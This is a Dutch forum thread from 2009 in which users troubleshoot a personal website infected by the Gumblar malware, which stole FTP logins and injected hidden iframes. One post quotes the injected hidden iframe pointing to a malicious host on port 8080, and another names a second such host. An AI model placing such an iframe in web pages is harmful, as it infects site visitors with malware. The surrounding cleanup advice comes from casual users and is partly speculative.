MissBliss | maandag 10 augustus 2009 @ 00:48 | |
Sinds vandaag doet mijn website raar! Hij staat in mn sig maar hij heeft dus een virus! Vanochtend wilde ik een foto van mn website linken, maar de betreffende simpleviewer-gallery deed het niet. Er stond dat ik Macromedia flash moest downloaden of doorklikken naar de gallery. Beide opties geprobeerd en het hielp allebei niet. Daarna kreeg ik ineens meldingen van mijn virusscanner (avast) dat er een worm/virus op mijn site zit. File name: http://fotoleonie.nl/\{gzip} Mailware name: HTML:Iframe-inf Malware type: Virus/worm. Dus ![]() Als ik mn website bezoek (met de virusscanner uit, ja niet zo slim misschien achteraf) ziet ie er helemaal raar uit, beginplaatje is weg, links openen in nieuwe tab enzo... Ik kijk net in de bron van mn site en er staat een regel die ik niet ken:
Zou dit het probleem zijn? En zo ja, hoe komt dat op mijn site? ![]() [ Bericht 6% gewijzigd door MissBliss op 11-08-2009 12:36:38 ] | ||
Juicyhil | maandag 10 augustus 2009 @ 00:58 | |
En als je naar deze pagina gaat: http://zdlz.in:8080/index.php Gaat je virusscanner dan ook stoer doen? Hij klaagt namelijk wel over een iframe ![]() | ||
mistermaniac | maandag 10 augustus 2009 @ 00:59 | |
Je bent niet de enige: Vreemd virus op mijn website? IP's blokkeren op ftp server Joomla als CMS? | ||
MissBliss | maandag 10 augustus 2009 @ 01:07 | |
quote:Die pagina doet niks bij mij. Niet openen, maar mn scanner zegt ook niks. quote:Argh ![]() Ik lees het eerste topic en ik moet bijna janken ![]() Gadverdamme ![]() Nee, geen Joomla trouwens, een vriend heeft de website gemaakt in Dreamweaver en ik heb vorige week wat gewijzigd in Nvu. Een vriendin met hetzelfde hostingbedrijf heeft hetzelfde probleem trouwens, dus het lijkt erop dat dit: quote:misschien het probleem kan zijn ![]() | ||
MissBliss | maandag 10 augustus 2009 @ 01:35 | |
https://support.pcextreme.nl/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=193 Ik ga deze stappen maar volgen! | ||
amvrosios | maandag 10 augustus 2009 @ 01:50 | |
lijkt op een of andere hacker..... | ||
Qwea | maandag 10 augustus 2009 @ 12:48 | |
ha! Jij ook al. Zoals in de SC al zei ben je besmet met een virus. Of iig een computer is besmet waarop je inlogt naar je ftp. Dat virus jat je ftp gegevens en dmv een script worden die kut iframes erin gepropt ![]() Mac gescant, geen virus. Dus dan kan het enkel de pc op zn werk zijn. ww veranderd, en tot nu toe niet weer gehad. Maar het is mooi kut, want het jat ALLE ftp gegevens. ![]() | ||
MissBliss | maandag 10 augustus 2009 @ 13:23 | |
Ja, echt een kutvirus ![]() Maar het lijkt nu weg te zijn ![]() | ||
St4ck3r | maandag 10 augustus 2009 @ 13:59 | |
Gumblar virus! Veel last van hier (ISP) ff je FTP gegevens wijzigen.. | ||
Qwea | maandag 10 augustus 2009 @ 14:07 | |
quote:Dat gaat dus enkel werken als je ook het virus verwijderd ![]() ![]() | ||
St4ck3r | maandag 10 augustus 2009 @ 14:41 | |
Dat spreekt voor zich.. Computer cleanen, iframes verwijderen, FTP gegevens wijzigen.. | ||
MissBliss | dinsdag 11 augustus 2009 @ 00:32 | |
Het virus is terug ![]() ![]() ![]() Nou, morgen alle stappen maar weer volgen ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 10:09 | |
Alles van je server pleuren, je backup helemaal nakijken. Dat virus verwijderen met avast (ik las zelfs dat meestal enkel formatten helpt ![]() Hier gelukkig geen virus aangetroffen, dus de ellende van het verwijderen/formatten hebben we niet gehad. | ||
MissBliss | dinsdag 11 augustus 2009 @ 11:13 | |
Format? Neeeeeeeeeeeeeeeeeeeee! | ||
Qwea | dinsdag 11 augustus 2009 @ 11:28 | |
quote:Ik las het op 3 websites. Te belachelijk ook ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 11:30 | |
Gumblar gebruikt FTP-logins om zichzelf verder te verspreiden. Om de infectie van deze nieuwe malwarekampioen op te sporen, kunnen er een aantal stappen worden genomen: 1. Zoek het bestand sqlsodbc.chm in de systeemfolder van Windows. (Bij XP is de locatie C:\Windows\System32\) 2. Zoek de Sha1 van sqlsodbc.chm. Dit kan met FileAlyzer. 3. Vergelijk daarna de verkregen Sha1 met de lijst van ScanSafe. 4. Als de Sha1 en de grootte van het bestand niet overeenkomen zou sprake kunnen zijn van een Gumblar infectie. ScanSafe heeft echter een radicaler advies. Het raadt een format van de harde schijf en een herinstallatie van Windows (en alle applicaties) aan als de meest effectieve manier om de Gumblar te bestrijden. Ook is het raadzaam om alle wachtwoorden te vervangen. | ||
MissBliss | dinsdag 11 augustus 2009 @ 11:30 | |
Argh ![]() Ik zit nu dus weer te scannen, maar avast heeft voorlopig nog niks gevonden. Misschien een andere virusscanner proberen. Ik weiger vooralsnog te formatteren ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 11:33 | |
quote:Oh, dit ga ik zo wel even doen dan. | ||
Qwea | dinsdag 11 augustus 2009 @ 11:35 | |
ik ben wel benieuwd als er wat gevonden wordt, wat het dan precies is.. MB. En als avast niks vindt, probeer dan eens de online scan van mcafee ofzo ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 11:38 | |
nog een stukje quote: quote:Heb je trouwens je computers in een netwerk gedeeld staan MB? Want dan kun je alle andere pc's ook gaan scannen | ||
MissBliss | dinsdag 11 augustus 2009 @ 11:41 | |
Avast heeft vannacht gescand, maar hij is (weer ![]() Ik probeer dat McAfee ook wel! Ja, we hebben idd een netwerk ![]() quote:Oh dit wordt een dagtaak ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 11:42 | |
quote:Start je comps op in safe mode, en ga vanuit daar scannen. En ik zou persoonlijk alles even van het netwerk loskoppelen dmv de stekkers eruit te trekken. Allemaal in safe mode opstarten, en gaan scannen. | ||
MissBliss | dinsdag 11 augustus 2009 @ 11:46 | |
quote:Ja, dat ga ik zo maar doen. Naja, Re heeft 1 vd laptops mee naar zn werk ![]() ![]() Gebeld: hij is ook geinfecteerd ![]() [ Bericht 6% gewijzigd door MissBliss op 11-08-2009 11:58:59 ] | ||
Qwea | dinsdag 11 augustus 2009 @ 12:01 | |
quote: ![]() ![]() ![]() | ||
St4ck3r | dinsdag 11 augustus 2009 @ 12:02 | |
<iframe src="http://c6h.at:8080/ts/in.cgi?pepsi138" width=125 height=125 style="visibility: hidden"></iframe> Ze wisselen wel mooi af met linkjes ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 12:03 | |
quote:ja ![]() Ik vraag me af, hoe dit concreet opgelost gaat worden. Zoals bovenstaand scenario.. als RE de laptop op het bedrijfsnetwerk heeft aangesloten, worden al die website's geinfecteerd... iedereen die die site's bezoekt, krijgt hem ook... Ga je dat ooit stoppen? | ||
MissBliss | dinsdag 11 augustus 2009 @ 12:10 | |
quote:Dat heb ik al gezegd ja. quote:Haal je dat nu van mijn site? Ik zou er niet heen gaan als ik jou was ![]() | ||
CantFazeMe | dinsdag 11 augustus 2009 @ 12:11 | |
Als je nog niet geformatteerd heb kan ik je misschien nog helpen. Formatteren altijd als een laatste optie houden. Maar het Gumblar (een redirect virus) spreidt zich inderdaad via websites en FTP. Je hoeft deze onderstaande stappen niet te volgen. (Is dit je eigen computer?) Alle tools op eigen risico. Stap 1: Download Trend Micro HijackThis http://www.trendsecure.co(...)ity_tools/hijackthis Systeem Scan Er zijn nog meerdere stappen zodra ik je HijackThis log heb bekeken. ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 12:11 | |
quote:Bij MM op het werk issie ook ![]() ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 12:18 | |
quote:Het is mn eigen computer ja. Ik durf dit niet ![]() Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van. Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft ![]() | ||
Re | dinsdag 11 augustus 2009 @ 12:20 | |
quote:call gelogd bij helpdesk, responsetijd 3 uur ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 12:23 | |
quote:3u? ![]() ![]() Ik zou dan ook gelijk aangeven dat ze de website's na moeten lopen die gehost worden bij je werk. En alle andere comps in het netwerk ![]() | ||
Dizer | dinsdag 11 augustus 2009 @ 12:23 | |
quote:Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken. Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen. Weer een reden om over te stappen op Apple ![]() ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 12:24 | |
quote:Klopt. Zolang dat virus nog actief is in je netwerk/ op je pc.. kun je veranderen wat je wilt maar dat gaat geen ruk helpen. Het wachtwoord wordt nou veranderd door dizer, maar jij kan niet inloggen op de servers meer... niet eerder dan je pc's schoon zijn, anders begin je weer van vooraf aan ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 12:25 | |
quote: ![]() Re had het toevallig wel van de week over: zullen we een nieuwe computer kopen? Dus wie weet ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 12:26 | |
quote:Nee, dan blijf ik er vanaf! Oh ja, wat ik wilde vragen: ik heb 2 versies van de site op mn pc staan, 1 op C en 1 op J. Ik upload hem altijd vanaf J. Is dan de kans groot dat het virus op J staat? Daar staan alleen foto's, muziek en die website dus, geen systeemdingen. | ||
Qwea | dinsdag 11 augustus 2009 @ 12:30 | |
quote: quote:Flash en adobe reader. quote: quote:Ik vraag me af waarom vista niet. overigens, wat moet PCextreme hieraan doen? Als je gewoon de nieuwe adobe's hebt... loop je geen risico. PCE kan moeilijk adobe voor je gaan updaten ![]() Trouwens, ik ben wel benieuwd naar de root login log van PC extreme. Kun je daaraan komen? | ||
Qwea | dinsdag 11 augustus 2009 @ 12:31 | |
quote:Dat ding kan zich werkelijk overal hebben ingenesteld. Doe een ctrl + alt + del... staat daar eigk een proces met iets als " gumblar" ? | ||
MissBliss | dinsdag 11 augustus 2009 @ 12:32 | |
Ok, ook niet meer googlen in IE dus ![]() Zal je zien, ben ik er straks na 100 jaar eindelijk vanaf, ga ik per ongeluk naar een besmette site en gebeurt het weer opnieuw ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 12:34 | |
quote:Nee, dat dan weer niet. | ||
Litso | dinsdag 11 augustus 2009 @ 12:34 | |
Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 12:34 | |
quote:Neh, je hebt avast toch? Die gaf gisteren flink lawaai toen ik op een besmette site kwam. Gewoon dan kiezen voor connectie afbreken... dan laad het iframe niet ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 12:35 | |
quote:Oh sorry ![]() Ik zal de link uit de OP halen! | ||
Qwea | dinsdag 11 augustus 2009 @ 12:35 | |
quote:Download ff avast. Ik snap het niet he... Ook op MikeyMo zn werk... ze hebben daar virusscanners... en geen enkele is afgegaan ![]() ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 12:35 | |
quote:Ok. | ||
Qwea | dinsdag 11 augustus 2009 @ 12:36 | |
MB? Is het handig om de TT te wijzigen? ![]() Ik zeg maar wat hoor ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 12:37 | |
quote:Ja, goed idee! Zal ik het zelf doen? ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 12:37 | |
quote:Ooh, en zet je internet beveiliging van avast (iets met surfen ofzo in de instellingen) op hoog ![]() ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 12:37 | |
quote:je bent toch niet voor jan snot mod ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 12:39 | |
Gedaan en gedaan ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 12:40 | |
![]() Loopt avast nog steeds vast nu je veilige modus hebt gedaan? | ||
MissBliss | dinsdag 11 augustus 2009 @ 12:41 | |
Ik heb (nog) geen veilige modus gedaan. Re heeft avast vanochtend aangezet en hij is nog niet klaar nu ![]() 79% nu, daarna ga ik wel even die online scanner proberen. | ||
Qwea | dinsdag 11 augustus 2009 @ 12:42 | |
Ik ben benieuwd wat avast wel of niet vindt iig ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 12:43 | |
Volgens mij tot nu toe nog niks ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 12:46 | |
quote:Hij hoeft ook niet perse op jouw pc te staan ![]() | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 12:46 | |
quote:Handig om daar op te klikken.. ![]() Overigens heb ik ervaren dat Malwarebytes Anti-Malware (vrij klein en gratis) erg goed werkt tegen deze hardnekkige dingen. Maar goed dit is ook nieuw voor me. Gelukkig zit ik nu op m'n Apple'tje werken.. ![]() [ Bericht 3% gewijzigd door Mr.Noodle op 11-08-2009 12:55:34 ] | ||
Re | dinsdag 11 augustus 2009 @ 12:47 | |
homepage is iig veranderd naar goolge ![]() ik krijg allemaal genereic FakeAlert.d!gen waarschuwingen, verder is er nog een sys.exe geinfecteerd waar de virusscan hier op kapotgaat:') | ||
MissBliss | dinsdag 11 augustus 2009 @ 12:49 | |
quote:Oh ![]() | ||
CantFazeMe | dinsdag 11 augustus 2009 @ 13:02 | |
quote:Ok. ![]() | ||
CantFazeMe | dinsdag 11 augustus 2009 @ 13:03 | |
Probeer dit dan maar. Updaten en scannen met Malwarebytes' Anti-Malware Update Malwarebytes' Anti-Malware | ||
Qwea | dinsdag 11 augustus 2009 @ 13:03 | |
quote: ![]() Ik hoop stiekem dat je slim bent geweest en je laptop uit het netwerk hebt getrokken? ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 13:04 | |
quote:Das het mooie van een netwerk. Stel je heb 500 comps in dat netwerk, en 1 van die 500 is besmet, dan kan dat virus bij alles van het netwerk. Dus ook bij de ftp gegevens. ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 13:07 | |
quote:Ga ik doen zodra avast klaar is ![]() 81% nu. | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 13:09 | |
Als ze gewoon even in heel het netwerk even Malwarebytes anti-malware installeren om het te detecteren en te verwijderen. Proces kan alleen wel enige uren duren als het voor meerdere machines geldt. aVast doet hier trouwens niet veel tegen.. ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 13:11 | |
quote:Until a few days ago, the only anti-virus software to detect and cage the virus was Avast! (one of the free ones!). Systemic, Norton and co were clueless. | ||
CantFazeMe | dinsdag 11 augustus 2009 @ 13:11 | |
Malwarebytes werkt alleen als er een virus/trojan actief is het is geen actieve scanner. (Het kan wel, maar dan moet je ervoor betalen.) ![]() Maar het is een zeer goed programma. ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 13:13 | |
quote:Die is toch ook actief | ||
CantFazeMe | dinsdag 11 augustus 2009 @ 13:15 | |
quote:Ja, ik bedoel proactieve bescherming (voorkomen van binnendringen systeem) daarvoor moet je betalen. (optioneel natuurlijk.) (beschermingsmodule) de rest is allemaal gratis. ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 13:17 | |
quote:Ja, maar dat is helemaal niet nodig. Het enige wat dat ding moet doen, is die gumblar verwijderen. Aangezien hij al actief is. En dat is gewoon gratis. Voor gewone bescherming draait ze op dr eigen pc avast. Wat draai je eigenlijk op die andere machines MB? | ||
MissBliss | dinsdag 11 augustus 2009 @ 13:17 | |
Avast is klaar, niks gevonden ![]() (Alleen 3 foto's die niet te scannen zijn, die zijn ook niet te verwijderen, heel raar, maar dat is al langer dus zal hier wel niks mee te maken hebben. Nu ga ik dat malwarebytes eens proberen. | ||
MissBliss | dinsdag 11 augustus 2009 @ 13:19 | |
quote:De minilaptop heeft AVG (heet dat zo?) en die van Re weet ik niet. Minilaptop heb ik nog niet aangehad, nog geen zin in ![]() | ||
Litso | dinsdag 11 augustus 2009 @ 13:19 | |
quote:Ben m aan het downloaden. Sophos vond niks, maar ik weet niet of die er al van op de hoogte is. Ik heb de helpdesk meteen maar ff ingelicht ![]() | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 13:19 | |
quote:aVast doet dan half werk, hij verwijderd het virus, maar laat de backup voorziening staan. Gevolg is bij reboot van de computer dat het virus zich uiteindelijk weer terug zet via het Windows Register en verborgen bestand ergens op de HD. Kun je weer scannen en hetzelfde proces opnieuw blijven doen. Dan blijf je bezig. | ||
Qwea | dinsdag 11 augustus 2009 @ 13:19 | |
quote:verwijder ze in veilige modus? Hier ook wel eens gehad... en dan doettie het wel. | ||
Qwea | dinsdag 11 augustus 2009 @ 13:20 | |
quote:aah ![]() Trouwens MB, die malware bytes, voer die idd even op je gehele netwerk uit en niet enkel op je eigen pc. | ||
CantFazeMe | dinsdag 11 augustus 2009 @ 13:21 | |
quote: ![]() ![]() ![]() Dat bedoel ik dus. ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 13:22 | |
quote:Avast zou ik sowieso als virusscanner gebruiken, maar aangezien die bij MB niks vindt, probeer ook ff die malware bytess ![]() Avast is tot nu toe de enige die ik heb meegemaakt die je weghaald bij de bad iframes. De rest geeft geen kick | ||
Qwea | dinsdag 11 augustus 2009 @ 13:22 | |
quote:Dat weet ik wel ![]() ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 13:23 | |
Even opnieuw opstarten, de J schijf is verdwenen ![]() Hoe moet ik het netwerk scannen dan? De gedeelde schijven? | ||
Qwea | dinsdag 11 augustus 2009 @ 13:25 | |
quote:Ik persoonlijk zou het heel omslachting doen (thats my middle name ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 13:26 | |
aah, er is druk iemad bezig met je site weer ok te maken zie ik ![]() | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 13:26 | |
quote:Netwerk scannen heeft niet echt veel zin als andere PC's ook Windows draaien. Trojans/virussen/malware nestelen zich 99% op de schijf waar Windows op geïnstalleerd is, meestal is dat door andere gebruikers niet toegankelijk via het netwerk. Tenzij de Admin erbij kan komen... Rest alleen dat er op elke computer dat progje geïnstalleerd moet worden. Maar goed, kijk eerst even of het bij jezelf werkt voordat je aan de rest begint.. ![]() | ||
Dizer | dinsdag 11 augustus 2009 @ 13:27 | |
quote:Ok maar begrijp ik hieruit dat: Je besmet bent. Je de virus weghaald. Je website vernieuwd Je alsnog nog een keer besmet kan raken omdat je een website hebt bezocht die alsnog besmet is? Wat is het leven toch heerlijk met een Mac ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 13:31 | |
quote:Ja. Als je het virus weghaalt, en je hebt een scanner die niet de bad iframes detecteerd (norton deed dat dus mooi niet gisteren) dan raak je opnieuw infected als je bv pietjepuk.nl bezoekt en die is besmet. Avast die ik heb, geef complete alarm bellen en dan heb je de keuze tussen doorgaan (en dus besmet worden) of de connectie afbreken zodat het iframe niet geladen wordt | ||
Re | dinsdag 11 augustus 2009 @ 13:34 | |
quote:mja, netwerk is hier wel redelijk goed beveiligd, hangen 25.000 computers aan ofzo, laptop ligt nu bij IT ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 13:35 | |
![]() Dat geeft avast dus aan... als er een bad iframe is | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 13:35 | |
Norton en Mcafee zijn ook logge verouderde rukprogramma's die gewoon niet voorbereid zijn op de nieuwere soorten virussen en dus hard achterlopen, maar dit was al een jaartje of 8 zo. | ||
Qwea | dinsdag 11 augustus 2009 @ 13:36 | |
quote:Maar je wilt niet weten hoeveel mensen die zooi nog gebruiken. Nieuwe comps worden grotendeels met mcafee geleverd. Donderdag nieuwe laptop gehaald ; mcafee zat erop ![]() Gelijk er maar afgelikkerd. | ||
Swetsenegger | dinsdag 11 augustus 2009 @ 13:37 | |
Maar die moet dan toch gebruik maken van een enorm gat in je browser? | ||
Qwea | dinsdag 11 augustus 2009 @ 13:38 | |
quote:Nee, in adobe dus. Want via adobe komt het binnen. | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 13:38 | |
quote:Ja, het scheelt je iig (tot nu toe) dit soort frustraties.. ![]() | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 13:39 | |
quote:Via de Adobe plugins waarvan je browser gebruik maken.. | ||
Qwea | dinsdag 11 augustus 2009 @ 13:40 | |
quote:Dat dus idd ![]() Nou snap ik nog steeds niet waarom vista er niet bij staat. Als infected platforms | ||
MissBliss | dinsdag 11 augustus 2009 @ 13:41 | |
quote:Ok ![]() Ja goed idee wel ![]() Oh, minilaptop heeft geen cd-romstation, kijken of het op een usb-stick past ![]() quote:Ja? Ik durf er niet meer te kijken ![]() | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 13:42 | |
Stiekem ben ik toch wel weer benieuwd naar de uitkomst van dit topic, meer als in hoeveel tijd men eraan kwijt is, hoeveel frustratie het oproept en hoeveel geld er verloren is omdat mensen niet normaal aan het werk kunnen.. ![]() sorry.. ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 13:42 | |
quote:Nou is het duidelijk dat het ftp gegevens steelt... maar in het stukje hier boven staat " wachtwoorden en gebruikers namen" dus dat geldt ook voor e-mail e.d? | ||
Qwea | dinsdag 11 augustus 2009 @ 13:43 | |
quote:Ja ![]() ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 13:44 | |
quote:Ik vind het ook zeer hilarisch. | ||
MissBliss | dinsdag 11 augustus 2009 @ 13:44 | |
quote:Oh dat, ja ik weet niet wat dat is, volgens mij gewoon het virus? | ||
Qwea | dinsdag 11 augustus 2009 @ 13:45 | |
quote:Nou, erg veel tijd. Het bedrijf waar mijn vriend werkt heeft het dus ook. En die hebben dus echt veel ftp gegevens van klanten e.d. En ik geloof dat de halve afdeling nu met dat virus bezig is ![]() Ik vind het werkelijk een KUT vrius ![]() | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 13:46 | |
quote:Stiekem leef ik ook wel met je mee hoor.. ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 13:46 | |
quote:ik krijg geen bad iframe melding ![]() Trouwens, je stickje (usb) ga je in je mini laptop proppen, scan je die dan ook gelijk even mee? ![]() | ||
amvrosios | dinsdag 11 augustus 2009 @ 13:47 | |
Formateren die zooi,je blijft toch altijd met rotzooi zitten, Damn,wat ben ik blij dat er ook gwn linux bestaat! | ||
MissBliss | dinsdag 11 augustus 2009 @ 13:47 | |
quote:Het stickje? Ja, die zal ik ook scannen ![]() | ||
Litso | dinsdag 11 augustus 2009 @ 13:48 | |
Wat een gruwelijk gebruiksonvriendelijk is Avast eigenlijk zeg. | ||
Re | dinsdag 11 augustus 2009 @ 13:49 | |
quote:je CF en SD kaartje er al uitgehaald ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 13:50 | |
quote:Ja doei ![]() Dat doe ik over een week wel als het dan nog niet weg is ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 13:50 | |
quote:Nu wel ![]() iPhone ook maar? ![]() Oh nee, das van Apple ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 13:51 | |
quote:si | ||
Qwea | dinsdag 11 augustus 2009 @ 13:51 | |
quote:vind je??? ![]() Ik vind het echt een ideale scanner ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 13:52 | |
quote:iphone heeft een ander besturingssysteem ![]() scan ook maar je sd kaartjes ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 13:55 | |
Ik ga even wat anders doen hoor ![]() | ||
Litso | dinsdag 11 augustus 2009 @ 13:55 | |
quote:Er staat nergens tekst, alleen een oerlelijk metallic design met een paar knoppen die niet voor zich spreken. Ik moet elke keer met mijn muis over de knoppen hoveren om te zien wat ze eigenlijk doen. Verder past er amper tekst in het schermpje waardoor er vanalles wordt afgekort, en kan ik nergens zien of en hoeveel bedreigingen er eigenlijk al zijn gevonden. En een 'settings' ofzo is er ook niet. | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 13:55 | |
Overigens heb je met Malwarebytes, "Perform Full Scan" gedaan? Die staat standaard volgens mij niet aan namelijk.. | ||
MissBliss | dinsdag 11 augustus 2009 @ 13:57 | |
Ja, volledige scan. | ||
Qwea | dinsdag 11 augustus 2009 @ 13:58 | |
quote:Hehehe.. in je taakbalk, naast je klok staat een mooi avast rondje, rechtermuisknop en dan programma instellingen ![]() Daar heb je instellingen die je kan aanpassen | ||
Re | dinsdag 11 augustus 2009 @ 14:02 | |
quote:de virusscan display is gewoon een beetje ruk vind ik ook wel eigenlijk... | ||
Litso | dinsdag 11 augustus 2009 @ 14:04 | |
Nou, avast vindt ook niks dus het zal meevallen ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 14:07 | |
quote:Ik zou toch malware bytes doen, gewoon voor de zekerheid ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 14:08 | |
quote:klopt. Maar het werkt wel ![]() ![]() | ||
CasB | dinsdag 11 augustus 2009 @ 14:14 | |
quote:Idd, ik ben blij dat ik lekker Ubuntu draai en geen gezeik heb met dit soort rare onzin. ![]() | ||
Walter_Sobchak | dinsdag 11 augustus 2009 @ 14:18 | |
quote:Dit al geprobeerd? | ||
Qwea | dinsdag 11 augustus 2009 @ 14:20 | |
quote:Komen al die linux goeroes weer ![]() quote: | ||
Qwea | dinsdag 11 augustus 2009 @ 14:20 | |
quote:Flikker op met je mac. Er staat er hier 1. Ik blijf mooi op windows. Trouwens, zet jullie semi geile kwijlsessies op linux en apple eens elders voort gaarne. | ||
CasB | dinsdag 11 augustus 2009 @ 14:27 | |
quote:Ik kan er ook niks aan doen dat de beveiliging van Windows zo slecht is. Ik heb zelf ook wel eens last gehad van malware in Windows, en het is te belachelijk voor woorden dat de enige oplossing is dat je je pc moet formatteren. Maar dat terzijde. Via wat voor flash/adobe programma ben je er dan eigenlijk aangekomen? Kan dat al als je op een site komt met dat iframe? | ||
Walter_Sobchak | dinsdag 11 augustus 2009 @ 14:28 | |
quote:Ben je mal? Ik vermaak me hier prima. Ik krijg er altijd dit gevoel bij. | ||
Re | dinsdag 11 augustus 2009 @ 14:30 | |
quote:zou je gewoon op willen zouten ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 14:31 | |
quote:Via adobe flash en reader. Geen idee hoe het precies werkt, ik heb nog geen last van het kreng gehad ![]() En formatten is IMHO ook wel erg rigoreus. Als ik een virus niet "normaal" weg krijg dan ga ik in het register spitten | ||
MissBliss | dinsdag 11 augustus 2009 @ 14:44 | |
Simpleviewer werkt met Adobe Flash. En het Apple en linuxgezeik mag van mij wel in een ander topic ![]() | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 14:50 | |
quote:Meeste mensen snappen van dat in het register spitten ook geen drol. Dus als dat niet lukt, dan blijft echt alleen formatteren over. Het scheelt in ieder geval een hoop tijd aan uitzoeken. Maar goed, we kijken eerst maar wat Malwarebytes oplevert. | ||
Noork | dinsdag 11 augustus 2009 @ 15:08 | |
Damn, heb net wat spyware opgelopen op jouw site. AVG hield het vreemdgenoeg niet goed tegen. | ||
Qwea | dinsdag 11 augustus 2009 @ 15:24 | |
quote:Nou ja, tijd aan uitzoeken? Weet je hoe omslachtig formatten is? Je kan alle partities gaan formatten. Dus je moet een back up maken, windows opnieuw installen, ect ![]() Je laat het een beetje klinken alsof formatten binnen een half u gepiept is ![]() ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 15:24 | |
quote:Sorry hoor, maar er staat VIRUS in de OP, de link in de OP is weggehaald, en er staat een waarschuwing. En toch ga je nog klikken? ![]() Ik krijg iig geen avast melding meer ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 15:27 | |
Volgens mij is Malwarebytes vastgelopen ![]() ![]() Als ik hem maximaliseer krijg ik zo'n wit scherm ![]() | ||
Noork | dinsdag 11 augustus 2009 @ 15:31 | |
quote:Moet toch zien waar het over gaat ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 15:31 | |
quote: ![]() Ooh boy. ![]() En als je hem in veilige modus draait? ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 15:32 | |
quote:Ik vind het alleen een beetje dom van je ![]() ![]() Ga maar malware draaien ![]() | ||
Noork | dinsdag 11 augustus 2009 @ 15:34 | |
quote:Is al opgelost. Hijackthis en een paar dingen verwijderen was voldoende. | ||
MissBliss | dinsdag 11 augustus 2009 @ 15:34 | |
quote:Taakbeheer liep zelfs vast ![]() Nou, poging 2! | ||
CantFazeMe | dinsdag 11 augustus 2009 @ 15:35 | |
Haal het linkje weg uit de OP misschien. ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 15:37 | |
quote:Dat staat er niet meer in ![]() Ik zal hem wel even uit mn sig halen ook. | ||
Thieske | dinsdag 11 augustus 2009 @ 15:41 | |
Ik wil dit topic even volgen. | ||
Qwea | dinsdag 11 augustus 2009 @ 15:41 | |
tof! ik heb hem ook ? ![]() | ||
CantFazeMe | dinsdag 11 augustus 2009 @ 15:42 | |
quote:Dank je. ![]() | ||
CantFazeMe | dinsdag 11 augustus 2009 @ 15:42 | |
quote:O really? ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 15:42 | |
quote:? | ||
Qwea | dinsdag 11 augustus 2009 @ 15:44 | |
C:\Users\Qwea\AppData\Roaming\Mozilla\Firefox\Profiles\zgodd7xy.default\formhistory.sqlite-journal![]() *zucht* *malware bytes download | ||
Qwea | dinsdag 11 augustus 2009 @ 15:45 | |
quote:ya, really ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 15:46 | |
elke x dat ik ga googlen flipt avast nu ![]() | ||
CantFazeMe | dinsdag 11 augustus 2009 @ 15:49 | |
quote: ![]() | ||
